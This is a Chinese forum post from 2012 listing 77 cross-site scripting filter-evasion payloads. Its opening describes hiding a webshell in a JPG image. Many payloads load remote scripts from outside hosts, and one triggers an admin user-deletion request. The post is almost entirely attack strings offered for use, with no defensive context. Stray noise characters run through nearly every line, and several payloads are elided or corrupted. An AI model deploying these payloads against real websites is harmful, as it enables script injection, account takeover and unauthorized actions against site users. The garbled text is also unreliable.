跨站图片shell
. M, F* C6 t0 O4 dXSS跨站代码 <script>alert("")</script>4 t `8 X* X. B/ |
! \+ x7 |) @, K/ v" @& @2 L3 N
将代码加入到马的第一行,将马改成JPG图片格式,访问图片格式的马时,也会执行我们的马- r1 a$ \& U& g1 U
& I7 u" O& z; a9 _/ E2 t
0 d0 n6 t% j& o7 h& l; m* d
1 [" l- u# u6 H+ S( c- Q
1)普通的XSS JavaScript注入
% u0 a5 ]5 o+ O- `% f N<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>8 V) w7 Y. x L0 a, X: \4 n% I
5 [' P$ |- R6 A q! E
(2)IMG标签XSS使用JavaScript命令
- r$ \& p$ i( y, X: P<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>' F) J( G9 Q. q/ D
( G9 c1 |6 \! Q+ O5 E& S% u
(3)IMG标签无分号无引号! J% K! t0 |% |; f! Y/ X X# m$ z
<IMG SRC=javascript:alert(‘XSS’)>1 K, C, N; l' b5 N
: e7 V# F9 d& U
(4)IMG标签大小写不敏感$ F) b. D+ H( s: h- m% f
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>/ W2 j/ r: K0 X
; k% M$ c2 ~5 l4 y
(5)HTML编码(必须有分号)
; N# r2 ~* q0 m/ f( t' n% Q: f<IMG SRC=javascript:alert(“XSS”)>2 i, s+ c3 Q) n& a h
$ ~* T R2 O4 k' I3 K" U
(6)修正缺陷IMG标签6 c% M* {5 W7 I, D% h3 _$ `1 n
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
, e/ h! l+ D! @! J7 p, ~+ m z/ O; R9 Z+ S1 Z$ w& k& M
(7)formCharCode标签(计算器)' K! ], h" G% E. I8 [% m
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>& T# h4 t% x, H+ P5 c& g) d8 B
% n5 K- T% q, W% @
(8)UTF-8的Unicode编码(计算器)5 X' ?8 ~* j* C
<IMG SRC=jav..省略..S')>
5 _. J/ z* Z$ ~/ _" C
0 k6 Y1 Y3 [; Y8 K(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
N# Z7 G0 ^ r6 G8 ^; T" {<IMG SRC=jav..省略..S')>
$ [3 y5 k8 w4 E7 T" ?! i! n( Q' Z4 R. z# \+ L, j
(10)十六进制编码也是没有分号(计算器)5 X2 ?& v0 n& q: R! b- K
<IMG SRC=java..省略..XSS')>
9 s2 x" J5 Z( X# o/ b! ]! N' x ^; Z5 Z0 ~, d6 s
(11)嵌入式标签,将Javascript分开
1 a" g) t; ?6 h$ c<IMG SRC=”jav ascript:alert(‘XSS’);”>
$ x( k' b8 X! c D5 g6 A2 ^' w3 v( z( B; U& W! ^: F1 l/ c8 n' v
(12)嵌入式编码标签,将Javascript分开
% R9 j3 P5 M. d<IMG SRC=”jav ascript:alert(‘XSS’);”>; M+ L! Q7 [) v5 _ I8 r
" w( g+ @: s: L$ Y1 o(13)嵌入式换行符$ h. h. L9 _/ B' w! ]) y
<IMG SRC=”jav ascript:alert(‘XSS’);”>
" j9 g6 X2 q' r7 U/ g1 G Z$ ]* _& Y5 ]+ c1 k
(14)嵌入式回车9 o: [* K9 [7 m' f
<IMG SRC=”jav ascript:alert(‘XSS’);”>
- Q1 @) M8 a& Q3 E# O7 w/ q: x- A
% E$ H) u# Z6 g- w$ W' g(15)嵌入式多行注入JavaScript,这是XSS极端的例子
2 Q( r/ p- n5 z, z9 W2 z<IMG SRC=”javascript:alert(‘XSS‘)”>' \% o# @( g5 E7 v4 D" ~
3 U6 d1 M6 l8 E- G: @7 j(16)解决限制字符(要求同页面)$ T8 Q' b9 k5 r2 [* j* t( h% a; {2 F4 ^
<script>z=’document.’</script>' \ M: T4 o3 t: d" e
<script>z=z+’write(“‘</script>
" ~2 X9 T1 ?0 ]; x) d H) ^9 z; X<script>z=z+’<script’</script>
; }8 o9 {( V" T5 m8 H# Y+ n<script>z=z+’ src=ht’</script>
8 W/ ~3 V5 n. {4 `- r# Q<script>z=z+’tp://ww’</script>
' w! H* V; s5 p k5 T% m<script>z=z+’w.shell’</script>8 ]. ?. e/ C7 |6 u9 g" w( I
<script>z=z+’.net/1.’</script>% x, R$ Q8 ^) n2 |7 N* }/ M |) t
<script>z=z+’js></sc’</script>
2 q# T, ?* p+ ^<script>z=z+’ript>”)’</script>
7 H, f6 D' O/ P; A$ Z7 X; \# n<script>eval_r(z)</script>: o- h8 G! t& q6 w+ |: W
" \( k. @3 |: K
(17)空字符5 T: X7 K: V8 I
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
# d- s7 d. V; c1 j$ b; J" C& F7 x& V
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用6 M2 ]& l) ~3 j4 O) k: B
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
' A* d, G7 Y# q# U# v
5 V" j: w$ X, t" _( K- r& [(19)Spaces和meta前的IMG标签
% N2 U, M" @" Z( Q% Q0 d<IMG SRC=” javascript:alert(‘XSS’);”>
" ^9 G$ B8 T$ @; ~/ u3 l4 [: n$ l3 ~) C( c
(20)Non-alpha-non-digit XSS7 m5 d5 N/ F& o4 H4 E' T
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
& d h/ f; g* o4 E- u! z+ X' \( E1 n) v" |6 Y) e9 i* A
(21)Non-alpha-non-digit XSS to 29 s) m( `* H3 y7 N6 `
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>0 U! |% w7 q. w/ _0 W& G
8 f% c) q) x' g/ E( v
(22)Non-alpha-non-digit XSS to 3
' s9 f4 I9 X; X/ C/ O( a2 v<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>- F4 j0 S3 ^ w/ S& _7 h( l% n! ~
9 S' Y. K; Z' G% R(23)双开括号0 \0 `4 N1 E! ]: q# |( J& n+ {
<<SCRIPT>alert(“XSS”);//<</SCRIPT># a; X! E1 ]# D+ a2 C
4 Z) s/ I# @" B* L8 T1 R! N(24)无结束脚本标记(仅火狐等浏览器)
@* _! k& @6 m: h, y<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
! ~6 x& N- ` R: ^! A
$ v _: Z) N8 I4 w7 u* j! ?(25)无结束脚本标记2
& \ ~6 }0 q+ _$ Z' s, b<SCRIPT SRC=//3w.org/XSS/xss.js>) L% M8 \3 c8 j( ]" S1 E
2 B/ N& a" x: L- h5 A6 Q- X- A' f
(26)半开的HTML/JavaScript XSS% j7 Y k' s" i3 x: D
<IMG SRC=”javascript:alert(‘XSS’)”
. b1 q' p/ n$ K' K% ~" ^+ W2 b
+ M/ O% D+ w9 h8 X' w(27)双开角括号
3 s1 Z6 q/ p9 g1 K: L) ? c! M( V<iframe src=http://3w.org/XSS.html <
" |" Y9 ^4 a$ N# |2 ?+ l: ]+ L \: U3 F# v3 l' B
(28)无单引号 双引号 分号( \) d% u% z6 X2 x8 h) `
<SCRIPT>a=/XSS/ ^6 i4 @, \) ^0 S1 {
alert(a.source)</SCRIPT>" s S! P0 G, p
$ i+ A4 `& a! a8 X5 Z2 d, `(29)换码过滤的JavaScript
8 O p8 Q4 O$ @\”;alert(‘XSS’);//
+ ^& W( i) N5 a0 Z" a; R$ e) a1 F% y
(30)结束Title标签
/ a. b8 s% v- i/ ^# J0 b! L* U% c3 X</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>4 a2 R. ~, N0 m) V; T. H$ ]
% z0 a/ j7 @, u8 c* u7 a(31)Input Image
; B) h6 A/ }5 z) _- X<INPUT SRC=”javascript:alert(‘XSS’);”>8 T2 X% t) Q' a2 j" F/ M
7 [/ @1 r! E4 A; Q+ {0 W1 m5 B
(32)BODY Image
/ ~ X. m' E' U5 f) C<BODY BACKGROUND=”javascript:alert(‘XSS’)”>; `1 U, h8 W( s1 B$ T
) S# Z8 x* R/ r% K- S8 P- `, @2 ?
(33)BODY标签7 q# S: X+ c; \2 b
<BODY(‘XSS’)># \& G$ z; m+ q
1 m( k! Z0 r5 I) o, P, [
(34)IMG Dynsrc, X& u- {7 ^5 O, j: _# y
<IMG DYNSRC=”javascript:alert(‘XSS’)”>
8 G- w. H2 U* f+ L8 {( e3 z5 `! t7 N: p% s: n4 G1 n; B
(35)IMG Lowsrc0 S# P& \8 j' D2 i
<IMG LOWSRC=”javascript:alert(‘XSS’)”>
! j: ^; w {) z9 j9 T
6 z5 V. u- K4 F% q- t9 v9 h(36)BGSOUND [% w! _$ E) x6 W ~, R
<BGSOUND SRC=”javascript:alert(‘XSS’);”> K5 e2 E3 M: G: [# z0 L" H0 M
" x7 c3 V* d/ `1 |7 }9 o
(37)STYLE sheet' w& C9 \* s- ?
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>0 X# G9 s- v# \. F" V0 j
4 h4 ?6 k9 `& H F, P(38)远程样式表0 G, `, ~- I, \, p7 s \
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
: P# P. m# L, {9 c# x1 `$ z
5 K- D$ @, U9 k3 F. C& k/ Q7 [(39)List-style-image(列表式)) @3 t9 I: g4 i& T, |2 c: y9 K
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
I! r6 R3 w8 H- K
: W7 H4 Z; |2 |(40)IMG VBscript' O1 M0 {/ P& ^, J. [ ]
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS0 @ M/ T" A/ h. z& F3 w
U% s! L; m6 \. O# e(41)META链接url
9 b+ h) i5 g: w3 j' x8 E<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
8 _, f( z/ A2 ]8 P: D4 q
% y* x# @1 n+ O# f6 x; z# o% h$ E% l5 L; }(42)Iframe
# E: q. M5 P4 _- ^; B# `4 `<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>7 [6 w* m- a- B; A) ~
(43)Frame! Q6 y' C f( R6 H+ P* m O
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>' q; L* x! O1 N# _
, c4 a9 @* Z [) y(44)Table
4 c$ [5 Q2 L) ?6 O0 K" I, d<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
, u% x$ z* x3 ~ M
1 u6 _1 ~) Z& ]+ ]9 [: R1 ](45)TD
9 k* X8 ?9 b4 D8 q<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
% L& O% B# `) z! q4 K6 p8 a4 o, [* E$ |" }
(46)DIV background-image
, }" c2 \ b: k$ Z9 s<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>6 }7 }3 i d3 Y9 f6 x
0 o& ` }- R/ B$ I: g4 L1 X5 T(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)1 v" m& P) r, }; l! H3 P# B
<DIV STYLE=”background-image: url( javascript:alert(‘XSS’))”>
; _" `- [) a7 }* V
3 c: P0 @+ v* m* P8 V(48)DIV expression
" T6 L& n/ N+ f$ `( o! i<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
8 t+ ?9 f5 o' }( v" ~, N, i
9 F8 [) t6 Q. @. d+ `(49)STYLE属性分拆表达
; T |5 K! f/ T! Q. K' {, ~: l) I<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
5 e1 y/ P1 @% u$ c9 l/ m% b3 R6 P* n! ?8 m B, k$ y& p2 _
(50)匿名STYLE(组成:开角号和一个字母开头)
: ? l- H% S1 n9 d M C1 {<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>% Q2 t" R* h. c& n" T. b5 u
& p- j/ m# h! H ]& f1 D; k1 X" N(51)STYLE background-image: y& Z+ X% Z7 \5 e2 K1 l, J1 ^4 p
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>
& Y8 L4 f$ T' L7 Q/ H2 {6 A/ |, q0 s4 c
(52)IMG STYLE方式
, n; s$ {+ q% f% O# y9 R" eexppression(alert(“XSS”))’>, a, v( O/ L( ~% M: \
2 A* j! K% m- a, C, x ^ ?/ D/ q(53)STYLE background
* R# |/ Z! ^* b7 x) M! c3 r$ A9 h<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
( J- e) x1 d! e4 B1 ?0 k8 ^/ m% U: c
/ C( ?- @3 T$ p; u9 p3 f: @(54)BASE2 J; ^1 W2 r' h H' c3 M+ ~" o
<BASE HREF=”javascript:alert(‘XSS’);//”>3 \. f1 T2 l; M0 W
' c# _" w" F- [, T' G* v1 ?(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
# Q& U, `9 a/ X( K, R<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
7 D+ e8 a' v0 ~. y1 U/ K' f/ h, M9 F+ P+ k+ l; m& X# g
(56)在flash中使用ActionScrpt可以混进你XSS的代码
, R1 \; I1 v. b4 @: ]0 S: ?* La=”get”;
# u7 }/ a# I; F; m) wb=”URL(\”";
' r1 Z3 y+ H# d! E9 z* L4 xc=”javascript:”;
) y* A! q8 E1 J4 A) A6 Jd=”alert(‘XSS’);\”)”;4 _, Z( x% x; Q$ ]
eval_r(a+b+c+d);, N+ u' i2 d# X8 C" S: e- N
. I2 X' Y6 f- \& ]. T3 |: f(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
/ p% f4 B o0 e4 A( X# }8 q) b; }6 b- I<HTML xmlns:xss>
9 }) ]; f, B" y2 N6 x/ i8 {6 Z7 m<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”># e1 e7 p; c# T
<xss:xss>XSS</xss:xss>
3 |! ]3 S1 @. v; Z</HTML>' m" ]) n- a4 ~; ?3 e
) V. g- L; `9 c(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
% k0 y7 S+ d' b$ a<SCRIPT SRC=””></SCRIPT>6 l5 g* `, w s5 S
9 s r a! D4 _, Q z( ?3 {* o& \6 y(59)IMG嵌入式命令,可执行任意命令
4 T* y& |0 s( n5 N3 k+ y8 D<IMG SRC=”http://www.XXX.com/a.php?a=b”>
/ u/ ^4 V( E" J* c5 S. i& g' K$ j( t/ \" e3 E. p
(60)IMG嵌入式命令(a.jpg在同服务器)
0 J+ S8 T D) `0 l3 P0 w7 u/ e: }Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser1 E) M# A! U8 |
2 T `1 B8 \- f) m1 x(61)绕符号过滤2 ]! a& p5 m) ~& R3 E! ^
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
0 o: Q3 o; X3 v7 |' ?0 `( e, M1 V: J& e& X% w' e. w" B" i4 {5 o
(62)
* n( U- h$ U) v/ ~1 h5 {, s<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>
/ u# Q4 N) c z/ x" [+ L
7 P- Z& J2 |/ }# `(63)3 r3 j, E% L+ v
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
5 _& Q1 N( }7 g5 l4 J" w; P+ k' x
(64) r1 a) q7 k( K8 n) @% V. U& Q) M
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>5 D) K0 c* i' d, o; O
* b9 D4 E/ [( B(65)
$ ^2 R9 m& B7 b* i" X: o<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>
+ Q8 W. ?3 n! D- l
1 m5 U$ G/ Q' R3 \(66)
7 k1 R% q1 [# m4 G<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>( j4 S8 m; s; i! a- u/ |- }
. N7 w) {2 y3 G(67)6 g! M& T. Y+ p/ F1 F; T" R
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>
+ Q, D* F' N5 A; R( d
8 P7 }. a! T& _(68)URL绕行
' y6 }4 n5 V- Q# k; @0 m4 Q% l, L- o<A HREF=”http://127.0.0.1/”>XSS</A>
$ u" X: [. Y4 i* p _
4 @- ]) r' E! x- d( ^% L(69)URL编码6 P* O1 K; t9 V( J) O
<A HREF=”http://3w.org”>XSS</A>
8 [/ W, ^/ D3 u6 W8 t) n4 R! |2 _' `" t& k7 f4 N" |
(70)IP十进制
+ b+ e! i6 K" c) s' b. s8 @<A HREF=”http://3232235521″>XSS</A>
0 D P/ M# H5 C8 {9 p
' e* a5 M3 Z, j% E! e(71)IP十六进制
# d% w7 z& B/ Y' n8 U<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>2 C7 [/ A( C6 C: F1 e) @2 _: _
1 I$ _5 j# c P6 D8 q2 V- \' V
(72)IP八进制
; u4 |2 |1 y2 Z& h% r7 E& \<A HREF=”http://0300.0250.0000.0001″>XSS</A>5 T( n$ j3 O& O; f
5 d! \8 V3 L* x$ R' \(73)混合编码
8 b4 X. D& ^- h- v4 k. m+ A, \<A HREF=”h" \ j$ H9 w( R5 d+ Q
tt p://6 6.000146.0×7.147/”">XSS</A>
: ^+ b, Q( s- g
2 O6 k$ s' U* u(74)节省[http:]
. a3 a( t$ H# U: a<A HREF=”//www.google.com/”>XSS</A>1 P, r8 r+ r# v( t# k0 X: c
. E9 S# L6 `& R7 f2 V8 Q+ D(75)节省[www]
& V6 l& B9 b% Z6 C5 r; G* B<A HREF=”http://google.com/”>XSS</A>
5 n; `# C, [8 |; H
" \5 O5 m! S& i8 C(76)绝对点绝对DNS& y; ?4 ~% t3 E
<A HREF=”http://www.google.com./”>XSS</A>5 M; \1 S" f0 J
4 K0 K/ H& v: Z- u0 O, X' v
(77)javascript链接
- {- Y4 P1 i9 ^" g1 _, t# L<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>
1 g) T) R# Q9 w& X6 N: J3 P |
发表于 2012-9-13 17:04:56
收藏
支持
反对